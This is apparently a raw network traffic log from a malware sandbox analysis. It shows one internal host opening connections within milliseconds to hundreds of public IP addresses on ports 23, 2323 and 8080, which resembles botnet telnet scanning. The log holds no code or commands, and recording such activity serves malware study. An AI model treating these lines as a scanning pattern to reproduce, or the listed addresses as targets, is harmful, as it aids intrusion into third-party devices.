                                                              Nov 13, 2023 22:17:59.743069887 CET139488080192.168.2.2331.19.244.99
                                                              Nov 13, 2023 22:17:59.743072033 CET139488080192.168.2.2331.23.239.168
                                                              Nov 13, 2023 22:17:59.743086100 CET139488080192.168.2.2385.27.107.115
                                                              Nov 13, 2023 22:17:59.743088007 CET139488080192.168.2.2385.208.119.112
                                                              Nov 13, 2023 22:17:59.743102074 CET139488080192.168.2.2394.201.129.34
                                                              Nov 13, 2023 22:17:59.743104935 CET139488080192.168.2.2394.82.112.131
                                                              Nov 13, 2023 22:17:59.743109941 CET139488080192.168.2.2331.168.141.247
                                                              Nov 13, 2023 22:17:59.743113995 CET139488080192.168.2.2331.112.60.186
                                                              Nov 13, 2023 22:17:59.743113995 CET139488080192.168.2.2362.48.36.161
                                                              Nov 13, 2023 22:17:59.743114948 CET139488080192.168.2.2362.138.82.27
                                                              Nov 13, 2023 22:17:59.743129015 CET139488080192.168.2.2331.124.40.19
                                                              Nov 13, 2023 22:17:59.743139029 CET139488080192.168.2.2385.248.83.160
                                                              Nov 13, 2023 22:17:59.743139029 CET139488080192.168.2.2394.51.128.78
                                                              Nov 13, 2023 22:17:59.743140936 CET139488080192.168.2.2395.205.163.9
                                                              Nov 13, 2023 22:17:59.743149996 CET139488080192.168.2.2331.63.137.116
                                                              Nov 13, 2023 22:17:59.743155003 CET139488080192.168.2.2331.55.225.143
                                                              Nov 13, 2023 22:17:59.743159056 CET139488080192.168.2.2395.33.5.243
                                                              Nov 13, 2023 22:17:59.743177891 CET139488080192.168.2.2331.28.172.91
                                                              Nov 13, 2023 22:17:59.743177891 CET139488080192.168.2.2331.218.73.110
                                                              Nov 13, 2023 22:17:59.743180037 CET139488080192.168.2.2395.56.128.36
                                                              Nov 13, 2023 22:17:59.743180037 CET139488080192.168.2.2331.164.93.3
                                                              Nov 13, 2023 22:17:59.743180037 CET139488080192.168.2.2385.198.133.102
                                                              Nov 13, 2023 22:17:59.743196011 CET139488080192.168.2.2385.230.128.170
                                                              Nov 13, 2023 22:17:59.743197918 CET139488080192.168.2.2394.218.230.207
                                                              Nov 13, 2023 22:17:59.743200064 CET139488080192.168.2.2362.96.98.90
                                                              Nov 13, 2023 22:17:59.743202925 CET139488080192.168.2.2362.90.97.13
                                                              Nov 13, 2023 22:17:59.743212938 CET139488080192.168.2.2395.181.101.247
                                                              Nov 13, 2023 22:17:59.743216991 CET139488080192.168.2.2385.181.214.224
                                                              Nov 13, 2023 22:17:59.743231058 CET139488080192.168.2.2395.214.73.55
                                                              Nov 13, 2023 22:17:59.743232965 CET139488080192.168.2.2395.23.80.89
                                                              Nov 13, 2023 22:17:59.743236065 CET139488080192.168.2.2394.104.208.29
                                                              Nov 13, 2023 22:17:59.743237019 CET139488080192.168.2.2395.14.51.10
                                                              Nov 13, 2023 22:17:59.743246078 CET139488080192.168.2.2394.15.248.148
                                                              Nov 13, 2023 22:17:59.743257999 CET139488080192.168.2.2331.54.64.57
                                                              Nov 13, 2023 22:17:59.743257999 CET139488080192.168.2.2331.121.225.84
                                                              Nov 13, 2023 22:17:59.743262053 CET139488080192.168.2.2385.202.235.81
                                                              Nov 13, 2023 22:17:59.743263960 CET139488080192.168.2.2385.30.248.186
                                                              Nov 13, 2023 22:17:59.743274927 CET139488080192.168.2.2331.211.211.203
                                                              Nov 13, 2023 22:17:59.743277073 CET139488080192.168.2.2394.19.112.77
                                                              Nov 13, 2023 22:17:59.743289948 CET139488080192.168.2.2362.51.197.175
                                                              Nov 13, 2023 22:17:59.743289948 CET139488080192.168.2.2331.48.159.31
                                                              Nov 13, 2023 22:17:59.743295908 CET139488080192.168.2.2394.218.111.224
                                                              Nov 13, 2023 22:17:59.743299961 CET139488080192.168.2.2362.100.215.81
                                                              Nov 13, 2023 22:17:59.743300915 CET139488080192.168.2.2331.172.205.224
                                                              Nov 13, 2023 22:17:59.743304014 CET139488080192.168.2.2385.12.152.70
                                                              Nov 13, 2023 22:17:59.743314981 CET139488080192.168.2.2394.119.194.250
                                                              Nov 13, 2023 22:17:59.743319035 CET139488080192.168.2.2395.146.200.230
                                                              Nov 13, 2023 22:17:59.743319988 CET139488080192.168.2.2331.51.155.164
                                                              Nov 13, 2023 22:17:59.743334055 CET139488080192.168.2.2395.209.16.12
                                                              Nov 13, 2023 22:17:59.743336916 CET139488080192.168.2.2395.242.84.94
                                                              Nov 13, 2023 22:17:59.743345022 CET139488080192.168.2.2394.89.160.57
                                                              Nov 13, 2023 22:17:59.743350983 CET139488080192.168.2.2394.34.112.152
                                                              Nov 13, 2023 22:17:59.743360996 CET139488080192.168.2.2331.94.88.180
                                                              Nov 13, 2023 22:17:59.743365049 CET139488080192.168.2.2394.77.153.187
                                                              Nov 13, 2023 22:17:59.743377924 CET139488080192.168.2.2362.195.96.222
                                                              Nov 13, 2023 22:17:59.743381977 CET139488080192.168.2.2394.41.50.43
                                                              Nov 13, 2023 22:17:59.743381977 CET139488080192.168.2.2362.31.156.126
                                                              Nov 13, 2023 22:17:59.743381977 CET139488080192.168.2.2362.46.50.145
                                                              Nov 13, 2023 22:17:59.743406057 CET139488080192.168.2.2394.249.86.96
                                                              Nov 13, 2023 22:17:59.743407011 CET139488080192.168.2.2385.236.91.99
                                                              Nov 13, 2023 22:17:59.743406057 CET139488080192.168.2.2395.67.10.164
                                                              Nov 13, 2023 22:17:59.743422031 CET139488080192.168.2.2395.100.97.75
                                                              Nov 13, 2023 22:17:59.743423939 CET139488080192.168.2.2395.33.127.253
                                                              Nov 13, 2023 22:17:59.743427992 CET139488080192.168.2.2362.41.248.62
                                                              Nov 13, 2023 22:17:59.743439913 CET139488080192.168.2.2331.51.195.136
                                                              Nov 13, 2023 22:17:59.743447065 CET139488080192.168.2.2395.153.158.219
                                                              Nov 13, 2023 22:17:59.743447065 CET139488080192.168.2.2362.112.80.245
                                                              Nov 13, 2023 22:17:59.743447065 CET139488080192.168.2.2331.13.89.36
                                                              Nov 13, 2023 22:17:59.743463039 CET139488080192.168.2.2394.185.66.117
                                                              Nov 13, 2023 22:17:59.743475914 CET139488080192.168.2.2394.21.140.3
                                                              Nov 13, 2023 22:17:59.743479967 CET139488080192.168.2.2394.188.228.102
                                                              Nov 13, 2023 22:17:59.743484020 CET139488080192.168.2.2394.31.19.32
                                                              Nov 13, 2023 22:17:59.743494987 CET139488080192.168.2.2395.215.241.46
                                                              Nov 13, 2023 22:17:59.743500948 CET139488080192.168.2.2362.164.230.49
                                                              Nov 13, 2023 22:17:59.743500948 CET139488080192.168.2.2331.178.167.64
                                                              Nov 13, 2023 22:17:59.743511915 CET139488080192.168.2.2395.182.118.43
                                                              Nov 13, 2023 22:17:59.743514061 CET139488080192.168.2.2395.116.154.45
                                                              Nov 13, 2023 22:17:59.743525028 CET139488080192.168.2.2331.90.190.56
                                                              Nov 13, 2023 22:17:59.743525982 CET139488080192.168.2.2394.142.15.148
                                                              Nov 13, 2023 22:17:59.743758917 CET472568080192.168.2.2394.23.242.65
                                                              Nov 13, 2023 22:17:59.743839025 CET333028080192.168.2.2331.136.252.65
                                                              Nov 13, 2023 22:17:59.768815041 CET113882323192.168.2.23212.179.152.36
                                                              Nov 13, 2023 22:17:59.768851042 CET1138823192.168.2.23220.51.69.50
                                                              Nov 13, 2023 22:17:59.768851995 CET1138823192.168.2.23129.111.185.112
                                                              Nov 13, 2023 22:17:59.768851042 CET1138823192.168.2.23154.62.211.135
                                                              Nov 13, 2023 22:17:59.768855095 CET1138823192.168.2.2382.135.228.18
                                                              Nov 13, 2023 22:17:59.768857002 CET1138823192.168.2.23211.226.8.69
                                                              Nov 13, 2023 22:17:59.768857002 CET1138823192.168.2.2369.230.68.42
                                                              Nov 13, 2023 22:17:59.768867016 CET113882323192.168.2.23221.157.213.138
                                                              Nov 13, 2023 22:17:59.768870115 CET1138823192.168.2.23122.139.215.223
                                                              Nov 13, 2023 22:17:59.768877983 CET1138823192.168.2.23130.245.63.15
                                                              Nov 13, 2023 22:17:59.768882036 CET1138823192.168.2.23157.96.192.145
                                                              Nov 13, 2023 22:17:59.768887997 CET1138823192.168.2.23167.13.77.93
                                                              Nov 13, 2023 22:17:59.768887997 CET1138823192.168.2.23182.68.98.171
                                                              Nov 13, 2023 22:17:59.768887997 CET1138823192.168.2.23110.133.226.175
                                                              Nov 13, 2023 22:17:59.768897057 CET1138823192.168.2.23114.121.121.197
                                                              Nov 13, 2023 22:17:59.768897057 CET1138823192.168.2.23171.25.95.227
                                                              Nov 13, 2023 22:17:59.768897057 CET1138823192.168.2.23140.215.67.90
                                                              Nov 13, 2023 22:17:59.768897057 CET1138823192.168.2.2372.120.127.140
                                                              Nov 13, 2023 22:17:59.768897057 CET1138823192.168.2.2366.52.32.139
                                                              Nov 13, 2023 22:17:59.768903017 CET1138823192.168.2.23191.14.31.11
                                                              Nov 13, 2023 22:17:59.768903971 CET113882323192.168.2.23140.14.147.33
                                                              Nov 13, 2023 22:17:59.768919945 CET1138823192.168.2.23118.214.114.205
                                                              Nov 13, 2023 22:17:59.768922091 CET1138823192.168.2.23184.83.45.2
                                                              Nov 13, 2023 22:17:59.768929005 CET1138823192.168.2.23158.44.199.242
                                                              Nov 13, 2023 22:17:59.768939018 CET1138823192.168.2.23144.244.239.191
                                                              Nov 13, 2023 22:17:59.768948078 CET1138823192.168.2.23198.215.213.152
                                                              Nov 13, 2023 22:17:59.768950939 CET1138823192.168.2.23219.211.29.22
                                                              Nov 13, 2023 22:17:59.768964052 CET1138823192.168.2.2357.146.18.16
                                                              Nov 13, 2023 22:17:59.768970013 CET1138823192.168.2.23103.231.167.137
                                                              Nov 13, 2023 22:17:59.768973112 CET1138823192.168.2.23217.91.86.173
                                                              Nov 13, 2023 22:17:59.768986940 CET1138823192.168.2.2371.217.176.35
                                                              Nov 13, 2023 22:17:59.768987894 CET113882323192.168.2.23148.218.199.210
                                                              Nov 13, 2023 22:17:59.768996000 CET1138823192.168.2.23187.231.189.197
                                                              Nov 13, 2023 22:17:59.768999100 CET1138823192.168.2.238.18.165.43
                                                              Nov 13, 2023 22:17:59.769004107 CET1138823192.168.2.2354.208.43.60
                                                              Nov 13, 2023 22:17:59.769017935 CET1138823192.168.2.23193.149.254.101
                                                              Nov 13, 2023 22:17:59.769021034 CET1138823192.168.2.2354.203.193.26
                                                              Nov 13, 2023 22:17:59.769026041 CET1138823192.168.2.23193.191.81.154
                                                              Nov 13, 2023 22:17:59.769031048 CET1138823192.168.2.23211.110.10.101
                                                              Nov 13, 2023 22:17:59.769041061 CET113882323192.168.2.23172.83.54.212
                                                              Nov 13, 2023 22:17:59.769042015 CET1138823192.168.2.2337.42.106.6
                                                              Nov 13, 2023 22:17:59.769046068 CET1138823192.168.2.2373.1.72.142
                                                              Nov 13, 2023 22:17:59.769056082 CET1138823192.168.2.23110.138.140.135
                                                              Nov 13, 2023 22:17:59.769061089 CET1138823192.168.2.23106.73.138.25
                                                              Nov 13, 2023 22:17:59.769063950 CET1138823192.168.2.23218.128.104.19
                                                              Nov 13, 2023 22:17:59.769077063 CET1138823192.168.2.23143.142.197.189
                                                              Nov 13, 2023 22:17:59.769077063 CET1138823192.168.2.2397.175.39.191
                                                              Nov 13, 2023 22:17:59.769077063 CET1138823192.168.2.2393.23.133.162
                                                              Nov 13, 2023 22:17:59.769083977 CET1138823192.168.2.2351.90.62.60
                                                              Nov 13, 2023 22:17:59.769094944 CET113882323192.168.2.23109.205.78.218
                                                              Nov 13, 2023 22:17:59.769103050 CET1138823192.168.2.23114.48.98.57
                                                              Nov 13, 2023 22:17:59.769104004 CET1138823192.168.2.2354.88.133.175
                                                              Nov 13, 2023 22:17:59.769105911 CET1138823192.168.2.23163.168.255.254
                                                              Nov 13, 2023 22:17:59.769113064 CET1138823192.168.2.23221.150.54.177
                                                              Nov 13, 2023 22:17:59.769121885 CET1138823192.168.2.23148.175.204.81
                                                              Nov 13, 2023 22:17:59.769121885 CET1138823192.168.2.2324.225.92.154
                                                              Nov 13, 2023 22:17:59.769123077 CET1138823192.168.2.23163.35.108.175
                                                              Nov 13, 2023 22:17:59.769136906 CET1138823192.168.2.23162.148.224.195
                                                              Nov 13, 2023 22:17:59.769140005 CET1138823192.168.2.23221.21.96.20
                                                              Nov 13, 2023 22:17:59.769145966 CET113882323192.168.2.2365.107.121.28
                                                              Nov 13, 2023 22:17:59.769154072 CET1138823192.168.2.23159.71.41.27
                                                              Nov 13, 2023 22:17:59.769164085 CET1138823192.168.2.2352.4.254.69
                                                              Nov 13, 2023 22:17:59.769164085 CET1138823192.168.2.2397.98.249.245
                                                              Nov 13, 2023 22:17:59.769164085 CET1138823192.168.2.23156.251.212.6
                                                              Nov 13, 2023 22:17:59.769171000 CET1138823192.168.2.23186.206.198.115
                                                              Nov 13, 2023 22:17:59.769176960 CET1138823192.168.2.23191.48.144.164
                                                              Nov 13, 2023 22:17:59.769191027 CET1138823192.168.2.23155.88.89.138
                                                              Nov 13, 2023 22:17:59.769191027 CET1138823192.168.2.2393.64.14.184
                                                              Nov 13, 2023 22:17:59.769195080 CET1138823192.168.2.23177.172.44.45
                                                              Nov 13, 2023 22:17:59.769203901 CET113882323192.168.2.23100.57.27.179
                                                              Nov 13, 2023 22:17:59.769207001 CET1138823192.168.2.2359.242.126.27
                                                              Nov 13, 2023 22:17:59.769207954 CET1138823192.168.2.23104.244.1.15
                                                              Nov 13, 2023 22:17:59.769222975 CET1138823192.168.2.23198.165.102.240
                                                              Nov 13, 2023 22:17:59.769226074 CET1138823192.168.2.2350.235.196.253
                                                              Nov 13, 2023 22:17:59.769226074 CET1138823192.168.2.23123.70.120.220
                                                              Nov 13, 2023 22:17:59.769227982 CET1138823192.168.2.2334.151.253.17
                                                              Nov 13, 2023 22:17:59.769232035 CET1138823192.168.2.23216.70.95.48
                                                              Nov 13, 2023 22:17:59.769232035 CET1138823192.168.2.23161.175.44.36
                                                              Nov 13, 2023 22:17:59.769239902 CET1138823192.168.2.23152.114.178.153
                                                              Nov 13, 2023 22:17:59.769256115 CET1138823192.168.2.23207.235.223.254
                                                              Nov 13, 2023 22:17:59.769258976 CET113882323192.168.2.2363.195.44.205
                                                              Nov 13, 2023 22:17:59.769258976 CET1138823192.168.2.2350.221.245.11
                                                              Nov 13, 2023 22:17:59.769259930 CET1138823192.168.2.23147.83.209.101
                                                              Nov 13, 2023 22:17:59.769274950 CET1138823192.168.2.23150.220.200.100
                                                              Nov 13, 2023 22:17:59.769290924 CET1138823192.168.2.23157.174.47.80
                                                              Nov 13, 2023 22:17:59.769292116 CET1138823192.168.2.23191.149.179.63
                                                              Nov 13, 2023 22:17:59.769295931 CET1138823192.168.2.23139.169.148.171
                                                              Nov 13, 2023 22:17:59.769298077 CET1138823192.168.2.2332.99.191.251
                                                              Nov 13, 2023 22:17:59.769313097 CET1138823192.168.2.23149.90.76.198
                                                              Nov 13, 2023 22:17:59.769316912 CET1138823192.168.2.23198.0.169.46
                                                              Nov 13, 2023 22:17:59.769316912 CET113882323192.168.2.23161.150.89.247
                                                              Nov 13, 2023 22:17:59.769320011 CET1138823192.168.2.23221.187.56.3
                                                              Nov 13, 2023 22:17:59.769330025 CET1138823192.168.2.23159.179.181.41
                                                              Nov 13, 2023 22:17:59.769337893 CET1138823192.168.2.23107.45.58.110
                                                              Nov 13, 2023 22:17:59.769341946 CET1138823192.168.2.23187.114.9.45
                                                              Nov 13, 2023 22:17:59.769342899 CET1138823192.168.2.2335.118.95.106
                                                              Nov 13, 2023 22:17:59.769365072 CET1138823192.168.2.23187.123.127.255
                                                              Nov 13, 2023 22:17:59.769366980 CET1138823192.168.2.2347.113.92.21
                                                              Nov 13, 2023 22:17:59.769367933 CET1138823192.168.2.23188.232.180.47
                                                              Nov 13, 2023 22:17:59.769371033 CET1138823192.168.2.23113.158.64.34
                                                              Nov 13, 2023 22:17:59.769383907 CET1138823192.168.2.23145.152.112.184
                                                              Nov 13, 2023 22:17:59.769387007 CET113882323192.168.2.2358.1.162.140
                                                              Nov 13, 2023 22:17:59.769391060 CET1138823192.168.2.23212.192.3.69
                                                              Nov 13, 2023 22:17:59.769391060 CET1138823192.168.2.2364.212.232.178
                                                              Nov 13, 2023 22:17:59.769404888 CET1138823192.168.2.23195.145.248.56
                                                              Nov 13, 2023 22:17:59.769406080 CET1138823192.168.2.2344.135.89.156
                                                              Nov 13, 2023 22:17:59.769407034 CET1138823192.168.2.23157.169.116.26
                                                              Nov 13, 2023 22:17:59.769414902 CET1138823192.168.2.23106.130.80.3
                                                              Nov 13, 2023 22:17:59.769414902 CET1138823192.168.2.23190.118.248.127
                                                              Nov 13, 2023 22:17:59.769419909 CET1138823192.168.2.23131.130.60.248
                                                              Nov 13, 2023 22:17:59.769421101 CET113882323192.168.2.2382.221.209.48
                                                              Nov 13, 2023 22:17:59.769433975 CET1138823192.168.2.23103.25.195.147
                                                              Nov 13, 2023 22:17:59.769438028 CET1138823192.168.2.23139.14.242.42
                                                              Nov 13, 2023 22:17:59.769443035 CET1138823192.168.2.2377.160.71.24
                                                              Nov 13, 2023 22:17:59.769452095 CET1138823192.168.2.23209.111.187.31
                                                              Nov 13, 2023 22:17:59.769459963 CET1138823192.168.2.23209.232.115.141
                                                              Nov 13, 2023 22:17:59.769460917 CET1138823192.168.2.2377.157.106.67
                                                              Nov 13, 2023 22:17:59.769510984 CET1138823192.168.2.2375.205.125.98
                                                              Nov 13, 2023 22:17:59.769510984 CET1138823192.168.2.23160.142.142.74
                                                              Nov 13, 2023 22:17:59.769510984 CET1138823192.168.2.23155.206.245.135
                                                              Nov 13, 2023 22:17:59.769515991 CET113882323192.168.2.23103.29.62.43
                                                              Nov 13, 2023 22:17:59.769526005 CET1138823192.168.2.23177.246.138.181
                                                              Nov 13, 2023 22:17:59.769527912 CET1138823192.168.2.23141.246.7.60
                                                              Nov 13, 2023 22:17:59.769545078 CET1138823192.168.2.23216.168.114.225
                                                              Nov 13, 2023 22:17:59.769546032 CET1138823192.168.2.2364.138.138.172
                                                              Nov 13, 2023 22:17:59.769562960 CET1138823192.168.2.23212.109.135.222
                                                              Nov 13, 2023 22:17:59.769565105 CET1138823192.168.2.2347.161.168.181
                                                              Nov 13, 2023 22:17:59.769565105 CET1138823192.168.2.23130.242.227.98
                                                              Nov 13, 2023 22:17:59.769579887 CET1138823192.168.2.2338.226.60.215
                                                              Nov 13, 2023 22:17:59.769582987 CET113882323192.168.2.2372.22.168.1
                                                              Nov 13, 2023 22:17:59.769584894 CET1138823192.168.2.2373.110.230.122
                                                              Nov 13, 2023 22:17:59.769584894 CET1138823192.168.2.23152.2.223.222
                                                              Nov 13, 2023 22:17:59.769598961 CET1138823192.168.2.23184.236.196.152
                                                              Nov 13, 2023 22:17:59.769603014 CET1138823192.168.2.23189.253.185.60
                                                              Nov 13, 2023 22:17:59.769608974 CET1138823192.168.2.2335.36.192.167
                                                              Nov 13, 2023 22:17:59.769620895 CET1138823192.168.2.2319.4.51.233
                                                              Nov 13, 2023 22:17:59.769623995 CET1138823192.168.2.23138.123.88.243
                                                              Nov 13, 2023 22:17:59.769623995 CET1138823192.168.2.23207.137.57.150
                                                              Nov 13, 2023 22:17:59.769628048 CET1138823192.168.2.23198.133.18.162
                                                              Nov 13, 2023 22:17:59.769628048 CET1138823192.168.2.23173.176.107.107
                                                              Nov 13, 2023 22:17:59.769642115 CET1138823192.168.2.23164.234.227.3
                                                              Nov 13, 2023 22:17:59.769646883 CET113882323192.168.2.235.94.223.244
                                                              Nov 13, 2023 22:17:59.769646883 CET1138823192.168.2.2388.39.126.164
                                                              Nov 13, 2023 22:17:59.769649029 CET1138823192.168.2.23193.214.8.160
                                                              Nov 13, 2023 22:17:59.769649982 CET1138823192.168.2.2340.35.123.150
                                                              Nov 13, 2023 22:17:59.769655943 CET1138823192.168.2.2337.124.196.235
                                                              Nov 13, 2023 22:17:59.769665956 CET1138823192.168.2.2379.170.47.204
                                                              Nov 13, 2023 22:17:59.769665956 CET1138823192.168.2.2353.23.246.146
                                                              Nov 13, 2023 22:17:59.769669056 CET1138823192.168.2.2381.227.95.233
                                                              Nov 13, 2023 22:17:59.769670963 CET1138823192.168.2.23137.11.18.49
                                                              Nov 13, 2023 22:17:59.769687891 CET1138823192.168.2.23213.91.59.201
                                                              Nov 13, 2023 22:17:59.769694090 CET1138823192.168.2.2343.126.61.78
                                                              Nov 13, 2023 22:17:59.769694090 CET1138823192.168.2.2367.43.91.17
                                                              Nov 13, 2023 22:17:59.769697905 CET113882323192.168.2.23157.166.18.70
                                                              Nov 13, 2023 22:17:59.769714117 CET1138823192.168.2.23155.168.160.78
                                                              Nov 13, 2023 22:17:59.769716024 CET1138823192.168.2.23200.110.170.128
                                                              Nov 13, 2023 22:17:59.769725084 CET1138823192.168.2.2387.245.86.164
                                                              Nov 13, 2023 22:17:59.769727945 CET1138823192.168.2.23126.250.11.37
                                                              Nov 13, 2023 22:17:59.769733906 CET1138823192.168.2.2318.150.72.137
                                                              Nov 13, 2023 22:17:59.769752979 CET113882323192.168.2.23192.72.191.206
                                                              Nov 13, 2023 22:17:59.769761086 CET1138823192.168.2.2364.76.190.91
                                                              Nov 13, 2023 22:17:59.769761086 CET1138823192.168.2.2377.210.104.202
                                                              Nov 13, 2023 22:17:59.769761086 CET1138823192.168.2.235.88.123.99
                                                              Nov 13, 2023 22:17:59.769761086 CET1138823192.168.2.2393.40.14.93
                                                              Nov 13, 2023 22:17:59.769763947 CET1138823192.168.2.23103.154.21.240
                                                              Nov 13, 2023 22:17:59.769763947 CET1138823192.168.2.2314.6.2.210
                                                              Nov 13, 2023 22:17:59.769774914 CET1138823192.168.2.23185.94.191.29
                                                              Nov 13, 2023 22:17:59.769774914 CET1138823192.168.2.23222.211.173.182
                                                              Nov 13, 2023 22:17:59.769777060 CET1138823192.168.2.23198.242.107.82
                                                              Nov 13, 2023 22:17:59.769778013 CET1138823192.168.2.23149.154.84.216
                                                              Nov 13, 2023 22:17:59.769795895 CET113882323192.168.2.23129.208.8.149
                                                              Nov 13, 2023 22:17:59.769795895 CET1138823192.168.2.2368.91.84.25
                                                              Nov 13, 2023 22:17:59.769800901 CET1138823192.168.2.23130.186.56.103
                                                              Nov 13, 2023 22:17:59.769813061 CET1138823192.168.2.2353.126.55.150
                                                              Nov 13, 2023 22:17:59.769820929 CET1138823192.168.2.23111.204.87.191
                                                              Nov 13, 2023 22:17:59.769838095 CET1138823192.168.2.23119.23.64.123
                                                              Nov 13, 2023 22:17:59.769840956 CET1138823192.168.2.2394.207.187.216
                                                              Nov 13, 2023 22:17:59.769841909 CET1138823192.168.2.23209.114.242.171
                                                              Nov 13, 2023 22:17:59.769840956 CET1138823192.168.2.2346.187.245.142
                                                              Nov 13, 2023 22:17:59.769841909 CET113882323192.168.2.2398.58.225.184
                                                              Nov 13, 2023 22:17:59.769841909 CET1138823192.168.2.23179.151.251.6
                                                              Nov 13, 2023 22:17:59.769841909 CET1138823192.168.2.2347.163.111.241
                                                              Nov 13, 2023 22:17:59.769849062 CET1138823192.168.2.238.227.26.198
                                                              Nov 13, 2023 22:17:59.769849062 CET1138823192.168.2.2363.76.200.236
                                                              Nov 13, 2023 22:17:59.769849062 CET1138823192.168.2.23126.66.127.66
                                                              Nov 13, 2023 22:17:59.769860983 CET1138823192.168.2.2343.23.207.130
                                                              Nov 13, 2023 22:17:59.769869089 CET1138823192.168.2.2359.205.236.203
                                                              Nov 13, 2023 22:17:59.769870043 CET1138823192.168.2.23213.207.22.156
                                                              Nov 13, 2023 22:17:59.769870996 CET1138823192.168.2.23120.39.241.247
                                                              Nov 13, 2023 22:17:59.769876003 CET1138823192.168.2.23126.78.121.117
                                                              Nov 13, 2023 22:17:59.769876003 CET1138823192.168.2.23109.178.41.214
                                                              Nov 13, 2023 22:17:59.769876003 CET113882323192.168.2.23147.134.122.77
                                                              Nov 13, 2023 22:17:59.769879103 CET1138823192.168.2.239.115.2.101
                                                              Nov 13, 2023 22:17:59.769897938 CET1138823192.168.2.23210.17.116.107
                                                              Nov 13, 2023 22:17:59.769897938 CET1138823192.168.2.23178.63.202.171
                                                              Nov 13, 2023 22:17:59.769900084 CET1138823192.168.2.2362.153.30.96
                                                              Nov 13, 2023 22:17:59.769897938 CET1138823192.168.2.23142.214.32.111
                                                              Nov 13, 2023 22:17:59.769912004 CET1138823192.168.2.23183.201.246.188
                                                              Nov 13, 2023 22:17:59.769915104 CET1138823192.168.2.23141.101.188.215
                                                              Nov 13, 2023 22:17:59.769931078 CET1138823192.168.2.2369.167.114.74
                                                              Nov 13, 2023 22:17:59.769937038 CET113882323192.168.2.2380.190.254.222
                                                              Nov 13, 2023 22:17:59.769938946 CET1138823192.168.2.2353.173.133.87
                                                              Nov 13, 2023 22:17:59.769939899 CET1138823192.168.2.2336.218.192.90
                                                              Nov 13, 2023 22:17:59.769939899 CET1138823192.168.2.23157.165.135.149
                                                              Nov 13, 2023 22:17:59.769942999 CET1138823192.168.2.23109.119.64.135
                                                              Nov 13, 2023 22:17:59.769942999 CET1138823192.168.2.23218.115.124.166
                                                              Nov 13, 2023 22:17:59.769959927 CET1138823192.168.2.2340.80.92.249
                                                              Nov 13, 2023 22:17:59.769961119 CET1138823192.168.2.23210.118.224.60
                                                              Nov 13, 2023 22:17:59.769964933 CET1138823192.168.2.23159.27.208.16
                                                              Nov 13, 2023 22:17:59.769967079 CET1138823192.168.2.23146.241.85.75
                                                              Nov 13, 2023 22:17:59.769974947 CET113882323192.168.2.23118.94.220.102
                                                              Nov 13, 2023 22:17:59.769984961 CET1138823192.168.2.23165.168.84.99
                                                              Nov 13, 2023 22:17:59.769989014 CET1138823192.168.2.2357.246.50.20
                                                              Nov 13, 2023 22:17:59.769990921 CET1138823192.168.2.23122.15.226.224
                                                              Nov 13, 2023 22:17:59.769999027 CET1138823192.168.2.23204.188.26.118
                                                              Nov 13, 2023 22:17:59.770001888 CET1138823192.168.2.2319.198.21.149
                                                              Nov 13, 2023 22:17:59.770009041 CET1138823192.168.2.23206.60.113.188
                                                              Nov 13, 2023 22:17:59.770018101 CET1138823192.168.2.23220.183.66.230
                                                              Nov 13, 2023 22:17:59.770057917 CET1138823192.168.2.23100.201.232.92
                                                              Nov 13, 2023 22:17:59.770057917 CET113882323192.168.2.23189.25.13.183
                                                              Nov 13, 2023 22:17:59.770060062 CET1138823192.168.2.23169.135.57.148
                                                              Nov 13, 2023 22:17:59.770071983 CET1138823192.168.2.23195.248.183.57
                                                              Nov 13, 2023 22:17:59.770077944 CET1138823192.168.2.23142.62.39.233
                                                              Nov 13, 2023 22:17:59.770078897 CET1138823192.168.2.23207.64.255.87
                                                              Nov 13, 2023 22:17:59.770080090 CET1138823192.168.2.23186.105.187.230
                                                              Nov 13, 2023 22:17:59.770096064 CET1138823192.168.2.2372.167.39.34
                                                              Nov 13, 2023 22:17:59.770097971 CET1138823192.168.2.2313.6.79.225
                                                              Nov 13, 2023 22:17:59.770097971 CET1138823192.168.2.2357.255.9.179
                                                              Nov 13, 2023 22:17:59.770098925 CET1138823192.168.2.23205.136.219.147
                                                              Nov 13, 2023 22:17:59.770100117 CET1138823192.168.2.2383.91.164.186
                                                              Nov 13, 2023 22:17:59.770109892 CET113882323192.168.2.23174.100.28.173
                                                              Nov 13, 2023 22:17:59.770112991 CET1138823192.168.2.23143.53.162.20
                                                              Nov 13, 2023 22:17:59.770116091 CET1138823192.168.2.23159.231.93.142
                                                              Nov 13, 2023 22:17:59.770117044 CET1138823192.168.2.23132.74.20.39
                                                              Nov 13, 2023 22:17:59.770134926 CET1138823192.168.2.2351.79.57.208
                                                              Nov 13, 2023 22:17:59.770137072 CET1138823192.168.2.23168.44.81.143
                                                              Nov 13, 2023 22:17:59.770137072 CET1138823192.168.2.2380.54.118.237
                                                              Nov 13, 2023 22:17:59.770140886 CET1138823192.168.2.23103.112.66.65
                                                              Nov 13, 2023 22:17:59.770140886 CET1138823192.168.2.23175.241.158.143
                                                              Nov 13, 2023 22:17:59.770150900 CET1138823192.168.2.2383.90.185.27
                                                              Nov 13, 2023 22:17:59.770157099 CET113882323192.168.2.23104.194.250.132
                                                              Nov 13, 2023 22:17:59.770159006 CET1138823192.168.2.2378.130.167.74
                                                              Nov 13, 2023 22:17:59.770167112 CET1138823192.168.2.234.239.197.110
                                                              Nov 13, 2023 22:17:59.770173073 CET1138823192.168.2.23189.35.253.227
                                                              Nov 13, 2023 22:17:59.770173073 CET1138823192.168.2.23137.166.172.106
                                                              Nov 13, 2023 22:17:59.770173073 CET1138823192.168.2.2335.1.115.143
                                                              Nov 13, 2023 22:17:59.770181894 CET1138823192.168.2.23134.226.25.45
                                                              Nov 13, 2023 22:17:59.770189047 CET1138823192.168.2.2344.236.9.153
                                                              Nov 13, 2023 22:17:59.770198107 CET1138823192.168.2.2335.198.252.104
                                                              Nov 13, 2023 22:17:59.770205021 CET113882323192.168.2.2343.181.57.3
                                                              Nov 13, 2023 22:17:59.770215988 CET1138823192.168.2.23138.203.235.108
                                                              Nov 13, 2023 22:17:59.770234108 CET1138823192.168.2.2365.181.124.76
                                                              Nov 13, 2023 22:17:59.770235062 CET1138823192.168.2.23192.75.10.6
                                                              Nov 13, 2023 22:17:59.770239115 CET1138823192.168.2.23177.22.5.59
                                                              Nov 13, 2023 22:17:59.770241976 CET1138823192.168.2.23206.131.253.29
                                                              Nov 13, 2023 22:17:59.770241976 CET1138823192.168.2.23219.40.228.180
                                                              Nov 13, 2023 22:17:59.770241976 CET1138823192.168.2.2312.56.58.89
                                                              Nov 13, 2023 22:17:59.770247936 CET1138823192.168.2.23195.247.218.192
                                                              Nov 13, 2023 22:17:59.770248890 CET1138823192.168.2.23107.254.114.132
                                                              Nov 13, 2023 22:17:59.770265102 CET1138823192.168.2.2353.57.113.248
